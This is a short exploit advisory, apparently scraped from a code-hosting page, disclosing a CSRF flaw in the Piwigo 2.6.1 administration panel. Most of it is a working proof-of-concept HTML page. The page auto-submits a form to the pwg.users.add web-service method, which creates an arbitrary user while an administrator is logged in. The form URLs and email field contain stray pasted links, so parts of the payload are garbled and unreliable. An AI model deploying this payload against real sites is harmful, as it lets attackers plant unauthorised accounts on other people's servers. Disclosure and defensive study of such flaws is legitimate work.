33 lines
No EOL
1 KiB
Text
33 lines
No EOL
1 KiB
Text
# Exploit Title: piwigo 2.6.1 - CSRF
|
|
# Date: 26/02/2014
|
|
# Exploit Author: killall-9@mail.com
|
|
# Vendor Homepage: http://it.piwigo.org/
|
|
# Software Link: http://it.piwigo.org/basics/downloads
|
|
# Version: 2.6.1
|
|
# Tested on: Virtualbox debian
|
|
|
|
A CSRF problem is present in the administration panel.
|
|
Here it is a POF according to a derived POST:
|
|
|
|
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
|
|
<html lang="en">
|
|
<head>
|
|
<title>Piwigo 2.6.1</title>
|
|
</head>
|
|
<body>
|
|
<form action="http://localhost/piwigo/ws.php?format=json&method=pwg.users.add http://localhost/piwigo/ws.php?format=json&method=pwg.users.add&lang=en " id="formid" method="post">
|
|
<input name="username" value="utente" />
|
|
<input name="password" value="utente" />
|
|
<input name="email" value="utente@gmail.com http://service.mail.com/callgate-6.73.1.0/rms/6.73.1.0/mail/getBody?folderId=1&messageId=OTg2SQZUNUQ2Occvtn5u651INxBSYcL4&purpose=display&bodyType=html# "/>
|
|
|
|
</form>
|
|
<script>
|
|
document.getElementById('formid').submit();
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
So you can add a new arbitrary user.
|
|
|
|
|
|
cheerz°°°° |